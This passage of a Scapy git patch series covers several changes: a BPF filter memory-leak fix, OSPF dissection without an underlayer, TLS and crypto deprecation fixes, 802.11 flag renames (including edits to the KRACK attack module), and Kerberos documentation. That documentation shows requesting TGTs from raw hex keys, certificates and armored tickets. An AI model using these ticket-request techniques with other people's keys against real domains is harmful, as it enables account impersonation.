[ + PID_UNKNOWN( + parameterId= 0x801e, + parameterLength= 4, + parameterData= b'\x00\x00\x00\x00', + ), + ], + sentinel= PID_SENTINEL( + parameterId= 0x1, + parameterLength= 0, + parameterData= b'', + ), + ), + data= DataPacket( + encapsulationKind= 0x1, + encapsulationOptions= 0x3, + serializedData= b'=\x00\x00\x00abcdefghij\x00\x00\x00\x00', + ), + ), + RTPSSubMessage_INFO_TS( + submessageId=9, + submessageFlags=1, + octetsToNextHeader=8, + ts_seconds=1638425814, + ts_fraction=2083784982, + ), + RTPSSubMessage_DATA( + submessageId= 0x15, + submessageFlags= 0x7, + octetsToNextHeader= 54, + extraFlags= 0x0, + octetsToInlineQoS= 16, + readerEntityIdKey= 0x0, + readerEntityIdKind= 0x0, + writerEntityIdKey= 0x0, + writerEntityIdKind= 0x0, + writerSeqNumHi= 0, + writerSeqNumLow= 4, + inlineQoS= InlineQoSPacket( + parameters= [ + PID_UNKNOWN( + parameterId= 0x801e, + parameterLength= 4, + parameterData= b'\x00\x00\x00\x00', + ), + ], + sentinel= PID_SENTINEL( + parameterId= 0x1, + parameterLength= 0, + parameterData= b'', + ), + ), + data= DataPacket( + encapsulationKind= 0x1, + encapsulationOptions= 0x3, + serializedData= b'=\x00\x00\x00abcdefghij\x00\x00\x00\x00', + ), + ), +]) + +d = b"\x52\x54\x50\x53\x02\x02\x01\x0f\x01\x0f\x45\xd2\xb3\xf5\x58\xb9" \ + b"\x01\x00\x00\x00\x09\x01\x08\x00\xd6\x64\xa8\x61\x16\x09\x34\x7c" \ + b"\x15\x07\x36\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + b"\x00\x00\x00\x00\x04\x00\x00\x00\x1e\x80\x04\x00\x00\x00\x00\x00" \ + b"\x01\x00\x00\x00\x00\x01\x00\x03\x3d\x00\x00\x00\x61\x62\x63\x64" \ + b"\x65\x66\x67\x68\x69\x6a\x00\x00\x00\x00\x09\x01\x08\x00\xd6\x64" \ + b"\xa8\x61\x16\x09\x34\x7c\x15\x07\x36\x00\x00\x00\x10\x00\x00\x00" \ + b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x1e\x80" \ + b"\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x01\x00\x03\x3d\x00" \ + b"\x00\x00\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x00\x00\x00\x00" + +assert RTPS(d) == p0 From 04ea2f36c011879e73e26910cffa8443e43f75c9 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Wed, 5 Nov 2025 00:15:05 +0100 Subject: [PATCH 1566/1632] BPF filter: fix memory leak (#4872) --- scapy/arch/bpf/core.py | 4 +++- scapy/arch/common.py | 8 ++++++++ scapy/arch/linux/__init__.py | 9 +++++---- 3 files changed, 16 insertions(+), 5 deletions(-) diff --git a/scapy/arch/bpf/core.py b/scapy/arch/bpf/core.py index db03a03c3a9..b2424fe38f6 100644 --- a/scapy/arch/bpf/core.py +++ b/scapy/arch/bpf/core.py @@ -14,7 +14,7 @@ import struct from scapy.arch.bpf.consts import BIOCSETF, BIOCSETIF -from scapy.arch.common import compile_filter +from scapy.arch.common import compile_filter, free_filter from scapy.config import conf from scapy.consts import LINUX from scapy.error import Scapy_Exception @@ -76,6 +76,8 @@ def attach_filter(fd, bpf_filter, iface): ret = fcntl.ioctl(fd, BIOCSETF, bp) if ret < 0: raise Scapy_Exception("Can't attach the BPF filter !") + # Free + free_filter(bp) def in6_getifaddr(): diff --git a/scapy/arch/common.py b/scapy/arch/common.py index 8077c3dd286..697b759db1e 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -132,6 +132,14 @@ def compile_filter(filter_exp, # type: str return bpf +def free_filter(bp: bpf_program) -> None: + """ + Free a bpf_program created with compile_filter + """ + from scapy.libs.winpcapy import pcap_freecode + pcap_freecode(ctypes.byref(bp)) + + ####### # DNS # ####### diff --git a/scapy/arch/linux/__init__.py b/scapy/arch/linux/__init__.py index f4e380487ba..29ad12cddc9 100644 --- a/scapy/arch/linux/__init__.py +++ b/scapy/arch/linux/__init__.py @@ -21,7 +21,7 @@ from scapy.compat import raw from scapy.consts import LINUX -from scapy.arch.common import compile_filter +from scapy.arch.common import compile_filter, free_filter from scapy.config import conf from scapy.data import MTU, ETH_P_ALL, SOL_PACKET, SO_ATTACH_FILTER, \ SO_TIMESTAMPNS @@ -130,13 +130,14 @@ def attach_filter(sock, bpf_filter, iface): if conf.use_pypy and sys.pypy_version_info <= (7, 3, 2): # type: ignore # PyPy < 7.3.2 has a broken behavior # https://foss.heptapod.net/pypy/pypy/-/issues/3298 - bp = struct.pack( # type: ignore + fp = struct.pack( 'HL', bp.bf_len, ctypes.addressof(bp.bf_insns.contents) ) else: - bp = sock_fprog(bp.bf_len, bp.bf_insns) # type: ignore - sock.setsockopt(socket.SOL_SOCKET, SO_ATTACH_FILTER, bp) + fp = sock_fprog(bp.bf_len, bp.bf_insns) # type: ignore + sock.setsockopt(socket.SOL_SOCKET, SO_ATTACH_FILTER, fp) + free_filter(bp) def set_promisc(s, iff, val=1): From 79e48dce03d9e9764d85545d5d478a3b130b7c08 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sat, 8 Nov 2025 03:31:18 +0100 Subject: [PATCH 1567/1632] OSPF: dissect without underlayer (#4871) --- scapy/contrib/ospf.py | 50 ++++++++++++++++++++++++++++--------------- test/contrib/ospf.uts | 8 +++++++ 2 files changed, 41 insertions(+), 17 deletions(-) diff --git a/scapy/contrib/ospf.py b/scapy/contrib/ospf.py index 7dbd3ea1881..44a538a1c66 100644 --- a/scapy/contrib/ospf.py +++ b/scapy/contrib/ospf.py @@ -396,13 +396,17 @@ class OSPF_AS_Scope_Opaque_LSA(OSPF_Link_Scope_Opaque_LSA): class OSPF_DBDesc(Packet): name = "OSPF Database Description" - fields_desc = [ShortField("mtu", 1500), - OSPFOptionsField(), - FlagsField("dbdescr", 0, 8, ["MS", "M", "I", "R", "4", "3", "2", "1"]), # noqa: E501 - IntField("ddseq", 1), - PacketListField("lsaheaders", None, OSPF_LSA_Hdr, - count_from=lambda pkt: None, - length_from=lambda pkt: pkt.underlayer.len - 24 - 8)] # noqa: E501 + fields_desc = [ + ShortField("mtu", 1500), + OSPFOptionsField(), + FlagsField("dbdescr", 0, 8, ["MS", "M", "I", "R", "4", "3", "2", "1"]), + IntField("ddseq", 1), + PacketListField( + "lsaheaders", None, OSPF_LSA_Hdr, + count_from=lambda pkt: None, + length_from=lambda pkt: pkt.underlayer and pkt.underlayer.len - 24 - 8, + ) + ] def guess_payload_class(self, payload): # check presence of LLS data block flag @@ -424,24 +428,36 @@ def extract_padding(self, s): class OSPF_LSReq(Packet): name = "OSPF Link State Request (container)" - fields_desc = [PacketListField("requests", None, OSPF_LSReq_Item, - count_from=lambda pkt:None, - length_from=lambda pkt:pkt.underlayer.len - 24)] # noqa: E501 + fields_desc = [ + PacketListField( + "requests", None, OSPF_LSReq_Item, + count_from=lambda pkt: None, + length_from=lambda pkt: pkt.underlayer and pkt.underlayer.len - 24, + ) + ] class OSPF_LSUpd(Packet): name = "OSPF Link State Update" - fields_desc = [FieldLenField("lsacount", None, fmt="!I", count_of="lsalist"), # noqa: E501 - PacketListField("lsalist", None, _LSAGuessPayloadClass, - count_from=lambda pkt: pkt.lsacount, - length_from=lambda pkt: pkt.underlayer.len - 24)] # noqa: E501 + fields_desc = [ + FieldLenField("lsacount", None, fmt="!I", count_of="lsalist"), + PacketListField( + "lsalist", None, _LSAGuessPayloadClass, + count_from=lambda pkt: pkt.lsacount, + length_from=lambda pkt: pkt.underlayer and pkt.underlayer.len - 24, + ) + ] class OSPF_LSAck(Packet): name = "OSPF Link State Acknowledgement" - fields_desc = [PacketListField("lsaheaders", None, OSPF_LSA_Hdr, - count_from=lambda pkt: None, - length_from=lambda pkt: pkt.underlayer.len - 24)] # noqa: E501 + fields_desc = [ + PacketListField( + "lsaheaders", None, OSPF_LSA_Hdr, + count_from=lambda pkt: None, + length_from=lambda pkt: pkt.underlayer and pkt.underlayer.len - 24, + ) + ] def answers(self, other): if isinstance(other, OSPF_LSUpd): diff --git a/test/contrib/ospf.uts b/test/contrib/ospf.uts index 081d180e64c..9b76bc8e0c9 100644 --- a/test/contrib/ospf.uts +++ b/test/contrib/ospf.uts @@ -80,3 +80,11 @@ p = OSPF_AS_Scope_Opaque_LSA(seq=0x80000005,data=opaque_data) assert (p.type == 11) assert (p.seq == 0x80000005) assert (len(p) == 132) + += OSPF - build/dissect without header + +OSPF_DBDesc().show2() +OSPF_LSReq().show2() +OSPF_LSUpd().show2() +OSPF_LSAck().show2() + From 325544192c83e08cbd2700e2821ad04fd74e22f9 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Sat, 8 Nov 2025 11:51:32 +0100 Subject: [PATCH 1568/1632] Add missing crypto_validator (#4870) --- scapy/layers/tls/handshake.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/scapy/layers/tls/handshake.py b/scapy/layers/tls/handshake.py index 6a5e3834c76..ba9a8452535 100644 --- a/scapy/layers/tls/handshake.py +++ b/scapy/layers/tls/handshake.py @@ -35,7 +35,7 @@ ) from scapy.compat import hex_bytes, orb, raw -from scapy.config import conf +from scapy.config import conf, crypto_validator from scapy.packet import Packet, Raw, Padding from scapy.utils import randstring, repr_hex from scapy.layers.x509 import OCSP_Response @@ -716,6 +716,7 @@ def build(self): self.sid = self.tls_session.sid return _TLSHandshake.build(self) + @crypto_validator def tls_session_update(self, msg_str): s = self.tls_session s.tls13_retry = True From 8e7e73bc6033706a95baf8a73399133dc1520651 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Mon, 24 Nov 2025 10:22:26 +0100 Subject: [PATCH 1569/1632] Rename unaccessible FCfields (#4869) This fixes https://github.com/secdev/scapy/issues/4628 --- scapy/layers/dot11.py | 10 +++++----- scapy/modules/krack/automaton.py | 8 ++++---- test/answering_machines.uts | 2 +- test/scapy/layers/dot11.uts | 1 + 4 files changed, 11 insertions(+), 10 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index 862ed6686de..63b3aeec551 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -708,7 +708,7 @@ class Dot11(Packet): [ ( FlagsField("FCfield", 0, 4, - ["pw-mgt", "MD", "protected", "order"]), + ["pw_mgt", "MD", "protected", "order"]), lambda pkt: (pkt.type, pkt.subtype) == (1, 6) ), ( @@ -718,8 +718,8 @@ class Dot11(Packet): ) ], FlagsField("FCfield", 0, 8, - ["to-DS", "from-DS", "MF", "retry", - "pw-mgt", "MD", "protected", "order"]) + ["to_DS", "from_DS", "MF", "retry", + "pw_mgt", "MD", "protected", "order"]) ), ConditionalField( BitField("FCfield_bw", 0, 3), @@ -746,7 +746,7 @@ class Dot11(Packet): ConditionalField( _Dot11MacField("addr4", ETHER_ANY, 4), lambda pkt: (pkt.type == 2 and - pkt.FCfield & 3 == 3), # from-DS+to-DS + pkt.FCfield & 3 == 3), # from_DS+to_DS ) ] @@ -2116,7 +2116,7 @@ def make_reply(self, p): tcp = p.getlayer(TCP) pay = raw(tcp.payload) p[IP].underlayer.remove_payload() - p.FCfield = "from-DS" + p.FCfield = "from_DS" p.addr1, p.addr2 = p.addr2, p.addr1 p /= IP(src=ip.dst, dst=ip.src) p /= TCP(sport=tcp.dport, dport=tcp.sport, diff --git a/scapy/modules/krack/automaton.py b/scapy/modules/krack/automaton.py index 5fd6fc99ae8..260257b7c8b 100644 --- a/scapy/modules/krack/automaton.py +++ b/scapy/modules/krack/automaton.py @@ -332,7 +332,7 @@ def build_GTK_KDE(self): ]) def send_wpa_enc(self, data, iv, seqnum, dest, mic_key, - key_idx=0, additionnal_flag=["from-DS"], + key_idx=0, additionnal_flag=["from_DS"], encrypt_key=None): """Send an encrypted packet with content @data, using IV @iv, sequence number @seqnum, MIC key @mic_key @@ -551,7 +551,7 @@ def send_wpa_handshake_1(self): addr1=self.client, addr2=self.mac, addr3=self.mac, - FCfield='from-DS', + FCfield='from_DS', SC=(next(self.seq_num) << 4), ) rep /= LLC(dsap=0xaa, ssap=0xaa, ctrl=3) @@ -595,7 +595,7 @@ def send_wpa_handshake_3(self, pkt): addr1=self.client, addr2=self.mac, addr3=self.mac, - FCfield='from-DS', + FCfield='from_DS', SC=(next(self.seq_num) << 4), ) @@ -652,7 +652,7 @@ def krack_proceed(self, send_3handshake=False, send_gtk=False): addr1=self.client, addr2=self.mac, addr3=self.mac, - FCfield='from-DS', + FCfield='from_DS', SC=(next(self.seq_num) << 4), subtype=0, type="Data", diff --git a/test/answering_machines.uts b/test/answering_machines.uts index 15a8e01e436..7aa36eee261 100644 --- a/test/answering_machines.uts +++ b/test/answering_machines.uts @@ -261,7 +261,7 @@ def check_WiFi_am_reply(packet): assert isinstance(packet, list) and len(packet) == 2 assert TCP in packet[0] and Raw in packet[0] and raw(packet[0][Raw]) == b"5c4pY" -test_WiFi_am(Dot11(FCfield="to-DS")/IP()/TCP()/"Scapy", +test_WiFi_am(Dot11(FCfield="to_DS")/IP()/TCP()/"Scapy", check_WiFi_am_reply, iffrom="scapy0", ifto="scapy1", replace="5c4pY", pattern="Scapy") diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index 0640980633d..65a59d0e907 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -99,6 +99,7 @@ assert raw(PPI()/Dot11(type=2, subtype=8, FCfield=0x40)/Dot11QoS()/Dot11WEP()) = conf.wepkey = "test123" a = PPI(b'\x00\x00\x08\x00i\x00\x00\x00\x88@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x008(^a') assert a[Dot11QoS][Dot11WEP].icv == 942169697 +assert not a[Dot11].FCfield.to_DS = Dot11TKIP - dissection From c211285c4659f24f6c75b7368cd3914f9661316e Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Mon, 1 Dec 2025 14:50:57 +0100 Subject: [PATCH 1570/1632] Address TripleDES + Camellia deprecations (#4881) --- scapy/layers/ipsec.py | 11 ++++++++--- scapy/layers/tls/crypto/cipher_block.py | 15 ++++++++++++--- scapy/libs/rfc3961.py | 5 +++-- 3 files changed, 23 insertions(+), 8 deletions(-) diff --git a/scapy/layers/ipsec.py b/scapy/layers/ipsec.py index 0815cabdbbc..921f9800748 100644 --- a/scapy/layers/ipsec.py +++ b/scapy/layers/ipsec.py @@ -215,12 +215,17 @@ def data_for_encryption(self): ) except ImportError: decrepit_algorithms = algorithms + + # cryptography's TripleDES can be used to simulate DES behavior + DES = lambda key: decrepit_algorithms.TripleDES(key * 3) + DES.key_sizes = decrepit_algorithms.TripleDES.key_sizes + DES.block_size = decrepit_algorithms.TripleDES.block_size else: log_loading.info("Can't import python-cryptography v1.7+. " "Disabled IPsec encryption/authentication.") default_backend = None InvalidTag = Exception - Cipher = algorithms = modes = None + Cipher = algorithms = modes = DES = None ############################################################################### @@ -573,9 +578,9 @@ def decrypt(self, sa, esp, key, icv_size=None, esn_en=False, esn=0): format_mode_iv=_salt_format_mode_iv) # noqa: E501 # Using a TripleDES cipher algorithm for DES is done by using the same 64 - # bits key 3 times (done by cryptography when given a 64 bits key) + # bits key 3 times CRYPT_ALGOS['DES'] = CryptAlgo('DES', - cipher=decrepit_algorithms.TripleDES, + cipher=DES, mode=modes.CBC, key_size=(8,)) CRYPT_ALGOS['3DES'] = CryptAlgo('3DES', diff --git a/scapy/layers/tls/crypto/cipher_block.py b/scapy/layers/tls/crypto/cipher_block.py index 4323b97e77b..6a96dec81ec 100644 --- a/scapy/layers/tls/crypto/cipher_block.py +++ b/scapy/layers/tls/crypto/cipher_block.py @@ -33,6 +33,15 @@ except ImportError: decrepit_algorithms = algorithms + # cryptography's TripleDES can be used to simulate DES behavior + DES = lambda key: decrepit_algorithms.TripleDES(key * 3) + + try: + # cryptography > 47.0 + Camellia = decrepit_algorithms.Camellia + except AttributeError: + Camellia = algorithms.Camellia + _tls_block_cipher_algs = {} @@ -134,7 +143,7 @@ class Cipher_AES_256_CBC(Cipher_AES_128_CBC): key_len = 32 class Cipher_CAMELLIA_128_CBC(_BlockCipher): - pc_cls = algorithms.Camellia + pc_cls = Camellia pc_cls_mode = modes.CBC block_size = 16 key_len = 16 @@ -149,13 +158,13 @@ class Cipher_CAMELLIA_256_CBC(Cipher_CAMELLIA_128_CBC): if conf.crypto_valid: class Cipher_DES_ECB(_BlockCipher): - pc_cls = decrepit_algorithms.TripleDES + pc_cls = staticmethod(DES) pc_cls_mode = modes.ECB block_size = 8 key_len = 8 class Cipher_DES_CBC(_BlockCipher): - pc_cls = decrepit_algorithms.TripleDES + pc_cls = staticmethod(DES) pc_cls_mode = modes.CBC block_size = 8 key_len = 8 diff --git a/scapy/libs/rfc3961.py b/scapy/libs/rfc3961.py index 858a9fa2073..ed6581ceaff 100644 --- a/scapy/libs/rfc3961.py +++ b/scapy/libs/rfc3961.py @@ -97,8 +97,9 @@ raise ImportError("To use kerberos cryptography, you need to install cryptography.") -# cryptography's TripleDES allow the usage of a 56bit key, which thus behaves like DES -DES = decrepit_algorithms.TripleDES +# cryptography's TripleDES can be used to simulate DES behavior +def DES(key: bytes) -> decrepit_algorithms.TripleDES: + return decrepit_algorithms.TripleDES(key * 3) # https://go.microsoft.com/fwlink/?LinkId=186039 From e73137ee6ce51f65f5e9c00ef771b2f42c96406b Mon Sep 17 00:00:00 2001 From: jiuyuan-light <89025318+jiuyuan-light@users.noreply.github.com> Date: Mon, 1 Dec 2025 21:54:15 +0800 Subject: [PATCH 1571/1632] TLS: fix _TLSSignature show2 (#4878) --- scapy/layers/tls/keyexchange.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/layers/tls/keyexchange.py b/scapy/layers/tls/keyexchange.py index 0f939b8358e..59049e1e6d3 100644 --- a/scapy/layers/tls/keyexchange.py +++ b/scapy/layers/tls/keyexchange.py @@ -170,7 +170,7 @@ class _TLSSignature(_GenericTLSSessionInheritance): def __init__(self, *args, **kargs): super(_TLSSignature, self).__init__(*args, **kargs) - if "sig_alg" not in kargs: + if self.sig_alg is None and "sig_alg" not in kargs: # Default sig_alg self.sig_alg = 0x0804 if self.tls_session and self.tls_session.tls_version: From 69fdfbffee8d042506629e1dd6aa25db1f6fad03 Mon Sep 17 00:00:00 2001 From: Gabriel <10530980+gpotter2@users.noreply.github.com> Date: Mon, 22 Dec 2025 14:25:54 +0100 Subject: [PATCH 1572/1632] Windows/Crypto rework: CertTree, CSR, PKINIT, Netlogon's Kerberos secure channel, older NTLM and more (#4879) * Implement CMS signing/verification * Implement PKINIT in AS-REQ + Improve SPNEGOSSP getter * NTLM: add old variant support * DCE/RPC: improve context handling * Kerberos: fix passive with DCE/RPC + improve deleg * MS-NRPC: support Kerberos secure channel * Fix case in Kerberos check * HTTP client: allow to drop channel bindings * Add Kerberos doc * PEP8 fixes * Cert.py: fix TreeChain tests * Add missing NETLOGON flags * SPNEGO: support reading KRB5CCNAME * SPNEGO: add tests & fix bugs * Update IKEv2 tests with new X509_AlgorithmIdentifier * doc: add FAST documentation * More correct omit * PEP8 & CI * Fix send test * Handle missing cryptography * SPNEGO: big refactor * Increase debugging logs * Add CSR parsing * cryptography test: include more crypto tests * Remove spnego.uts from test configurations Removed spnego.uts from the cryptography test configurations. --- .github/workflows/cifuzz.yml | 2 +- doc/scapy/layers/kerberos.rst | 33 +- scapy/asn1/mib.py | 54 +- scapy/asn1fields.py | 28 +- scapy/layers/dcerpc.py | 11 +- scapy/layers/gssapi.py | 61 +- scapy/layers/http.py | 7 +- scapy/layers/kerberos.py | 775 ++++++++++++++----- scapy/layers/ldap.py | 4 +- scapy/layers/msrpce/msnrpc.py | 244 ++++-- scapy/layers/msrpce/rpcclient.py | 219 ++++-- scapy/layers/msrpce/rpcserver.py | 5 +- scapy/layers/ntlm.py | 468 ++++++++--- scapy/layers/smb.py | 9 +- scapy/layers/smb2.py | 6 +- scapy/layers/smbclient.py | 14 +- scapy/layers/smbserver.py | 3 +- scapy/layers/spnego.py | 893 ++++++++++++--------- scapy/layers/tls/cert.py | 1116 ++++++++++++++++++++++----- scapy/layers/tls/handshake_sslv2.py | 2 +- scapy/layers/tls/keyexchange.py | 2 +- scapy/layers/tpm.py | 729 +++++++++++++++++ scapy/layers/x509.py | 645 ++++++++++++++-- scapy/libs/rfc3961.py | 32 + scapy/modules/ticketer.py | 40 +- test/configs/cryptography.utsc | 2 +- test/contrib/ikev2.uts | 4 +- test/contrib/send.uts | 2 +- test/scapy/layers/dcerpc.uts | 6 +- test/scapy/layers/kerberos.uts | 209 ++++- test/scapy/layers/msnrpc.uts | 28 +- test/scapy/layers/ntlm.uts | 40 +- test/scapy/layers/smb.uts | 12 +- test/scapy/layers/spnego.uts | 317 ++++++++ test/scapy/layers/tls/cert.uts | 582 +++++++++++--- 35 files changed, 5236 insertions(+), 1368 deletions(-) create mode 100644 scapy/layers/tpm.py create mode 100644 test/scapy/layers/spnego.uts diff --git a/.github/workflows/cifuzz.yml b/.github/workflows/cifuzz.yml index 3e173be1825..64d933590a8 100644 --- a/.github/workflows/cifuzz.yml +++ b/.github/workflows/cifuzz.yml @@ -1,7 +1,7 @@ name: CIFuzz on: - pull_request: + push: branches: [master] permissions: diff --git a/doc/scapy/layers/kerberos.rst b/doc/scapy/layers/kerberos.rst index 168e2d7ecab..2ab19f5db83 100644 --- a/doc/scapy/layers/kerberos.rst +++ b/doc/scapy/layers/kerberos.rst @@ -41,11 +41,11 @@ This section tries to give many usage examples, but isn't exhaustive. For more d >>> t.show() Tickets: 0. Administrator@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL - Start time End time Renew until Auth time + Start time End time Renew until Auth time 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 1. Administrator@DOMAIN.LOCAL -> host/dc1.domain.local@DOMAIN.LOCAL - Start time End time Renew until Auth time + Start time End time Renew until Auth time 31/08/23 11:39:07 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 @@ -68,12 +68,41 @@ This section tries to give many usage examples, but isn't exhaustive. For more d >>> # Using the AES-256-SHA1-96 Kerberos Key >>> t.request_tgt("Administrator@domain.local", key=Key(EncryptionType.AES256_CTS_HMAC_SHA1_96, bytes.fromhex("63a2577d8bf6abeba0847cded36b9aed202c23750eb9c56b6155be1cc946bb1d"))) +- **Request a TGT using PKINIT**: + +.. code:: pycon + + >>> from scapy.libs.rfc3961 import EncryptionType + >>> load_module("ticketer") + >>> t = Ticketer() + >>> # If P12: + >>> t.request_tgt("Administrator@DOMAIN.LOCAL", p12="admin.pfx", ca="ca.pem") + >>> # One could also have used a different cert and key file: + >>> t.request_tgt("Administrator@DOMAIN.LOCAL", x509="admin.cert", x509key="admin.key", ca="ca.pem") + +- **Request a user TGT with Kerberos armoring (FAST)** + +The ``armor_with`` keyword allows to select a ticket to armor the request with. + +.. code:: pycon + + >>> load_module("ticketer") + >>> t = Ticketer() + >>> t.request_tgt("Machine01$@DOMAIN.LOCAL", key=Key(EncryptionType.RC4_HMAC, bytes.fromhex("2b576acbe6bcfda7294d6bd18041b8fe"))) + >>> t.show() + Tickets: + 0. Machine01$@DOMAIN.LOCAL -> krbtgt/DOMAIN.LOCAL@DOMAIN.LOCAL + Start time End time Renew until Auth time + 31/08/23 11:38:34 31/08/23 21:38:34 31/08/23 21:38:35 31/08/23 01:38:34 + >>> t.request_tgt("Administrator@domain.local", armor_with=0) # Armor with ticket n°0 + - **Renew a TGT or ST**: .. code:: >>> t.renew(0) # renew TGT >>> t.renew(1) # renew ST. Works only with 'host/' SPNs + >>> t.renew(1, armor_with=0) # renew something with armoring - **Import tickets from a ccache**: diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index 029f8281225..7bb30811e00 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -284,16 +284,25 @@ def load_mib(filenames): "1.3.101.113": "Ed448", } +# pkcs3 # + +pkcs3_oids = { + "1.2.840.113549.1.3": "pkcs-3", + "1.2.840.113549.1.3.1": "dhKeyAgreement", +} + # pkcs7 # pkcs7_oids = { + "1.2.840.113549.1.7": "pkcs-7", "1.2.840.113549.1.7.2": "id-signedData", + "1.2.840.113549.1.7.3": "id-envelopedData", } # pkcs9 # pkcs9_oids = { - "1.2.840.113549.1.9": "pkcs9", + "1.2.840.113549.1.9": "pkcs-9", "1.2.840.113549.1.9.0": "modules", "1.2.840.113549.1.9.1": "emailAddress", "1.2.840.113549.1.9.2": "unstructuredName", @@ -320,6 +329,13 @@ def load_mib(filenames): "1.2.840.113549.1.9.52": "id-aa-CMSAlgorithmProtection" } +# enc algs # + +encAlgs_oids = { + "1.2.840.113549.3.4": "rc4", + "1.2.840.113549.3.7": "des-ede3-cbc", +} + # x509 # attributeType_oids = { @@ -492,10 +508,21 @@ def load_mib(filenames): "2.5.29.67": "id-ce-allowedAttAss", "2.5.29.68": "id-ce-attributeMappings", "2.5.29.69": "id-ce-holderNameConstraints", - # [MS-WCCE] - "1.3.6.1.4.1.311.2.1.14": "CERT_EXTENSIONS", - "1.3.6.1.4.1.311.10.3.4": "szOID_EFS_CRYPTO", + # [MS-WCCE] + wincrypt.h + "1.3.6.1.4.1.311.2.1.14": "OID_CERT_EXTENSIONS", + "1.3.6.1.4.1.311.10.3.4": "OID_EFS_CRYPTO", + "1.3.6.1.4.1.311.13.2.1": "OID_ENROLLMENT_NAME_VALUE_PAIR", + "1.3.6.1.4.1.311.13.2.2": "OID_ENROLLMENT_CSP_PROVIDER", + "1.3.6.1.4.1.311.13.2.3": "OID_OS_VERSION", + "1.3.6.1.4.1.311.10.10.1": "OID_CMC_ADD_ATTRIBUTES", "1.3.6.1.4.1.311.20.2": "ENROLL_CERTTYPE", + "1.3.6.1.4.1.311.21.10": "OID_APPLICATION_CERT_POLICIES", + "1.3.6.1.4.1.311.21.20": "OID_REQUEST_CLIENT_INFO", + "1.3.6.1.4.1.311.21.23": "OID_ENROLL_EK_INFO", + "1.3.6.1.4.1.311.21.24": "OID_ENROLL_ATTESTATION_STATEMENT", + "1.3.6.1.4.1.311.21.25": "OID_ENROLL_KSP_NAME", + "1.3.6.1.4.1.311.21.39": "OID_ENROLL_AIK_INFO", + "1.3.6.1.4.1.311.21.7": "OID_CERTIFICATE_TEMPLATE", "1.3.6.1.4.1.311.25.1": "NTDS_REPLICATION", "1.3.6.1.4.1.311.25.2": "NTDS_CA_SECURITY_EXT", "1.3.6.1.4.1.311.25.2.1": "NTDS_OBJECTSID", @@ -551,6 +578,15 @@ def load_mib(filenames): "1.3.6.1.5.5.7.3.22": "secureShellServer" } +certPkixCmc_oids = { + "1.3.6.1.5.5.7.7.8": "id-cmc-addExtensions", +} + +certPkixCct_oids = { + "1.3.6.1.5.5.7.12.2": "id-cct-PKIData", + "1.3.6.1.5.5.7.12.3": "id-cct-PKIResponse", +} + certPkixAd_oids = { "1.3.6.1.5.5.7.48.1": "ocsp", "1.3.6.1.5.5.7.48.2": "caIssuers", @@ -563,6 +599,11 @@ def load_mib(filenames): "1.3.6.1.5.5.7.48.1.1": "basic-response" } +certIpsec_oids = { + "1.3.6.1.5.5.8.2.1": "iKEEnd", + "1.3.6.1.5.5.8.2.2": "iKEIntermediate", +} + certTransp_oids = { '1.3.6.1.4.1.11129.2.4.2': "SignedCertificateTimestampList", } @@ -724,16 +765,21 @@ def load_mib(filenames): secsig_oids, nist_oids, thawte_oids, + pkcs3_oids, pkcs7_oids, pkcs9_oids, + encAlgs_oids, attributeType_oids, certificateExtension_oids, certExt_oids, certPkixAd_oids, certPkixKp_oids, + certPkixCmc_oids, + certPkixCct_oids, certPkixPe_oids, certPkixQt_oids, certPolicy_oids, + certIpsec_oids, certTransp_oids, evPolicy_oids, x962KeyType_oids, diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index f2d8613af37..9a5284bddfc 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -31,7 +31,6 @@ BER_tagging_enc, ) from scapy.base_classes import BasePacket -from scapy.compat import raw from scapy.volatile import ( GeneralizedTime, RandChoice, @@ -599,7 +598,7 @@ def build(self, pkt): elif val is None: s = b"" else: - s = b"".join(raw(i) for i in val) + s = b"".join(bytes(i) for i in val) return self.i2m(pkt, s) def i2repr(self, pkt, x): @@ -642,6 +641,9 @@ class ASN1F_TIME_TICKS(ASN1F_INTEGER): ############################# class ASN1F_optional(ASN1F_element): + """ + ASN.1 field that is optional. + """ def __init__(self, field): # type: (ASN1F_field[Any, Any]) -> None field.flexible_tag = False @@ -682,6 +684,20 @@ def i2repr(self, pkt, x): return self._field.i2repr(pkt, x) +class ASN1F_omit(ASN1F_field[None, None]): + """ + ASN.1 field that is not specified. This is simply omitted on the network. + This is different from ASN1F_NULL which has a network representation. + """ + def m2i(self, pkt, s): + # type: (ASN1_Packet, bytes) -> Tuple[None, bytes] + return None, s + + def i2m(self, pkt, x): + # type: (ASN1_Packet, Optional[bytes]) -> bytes + return b"" + + _CHOICE_T = Union['ASN1_Packet', Type[ASN1F_field[Any, Any]], 'ASN1F_PACKET'] @@ -769,7 +785,7 @@ def i2m(self, pkt, x): if x is None: s = b"" else: - s = raw(x) + s = bytes(x) if hash(type(x)) in 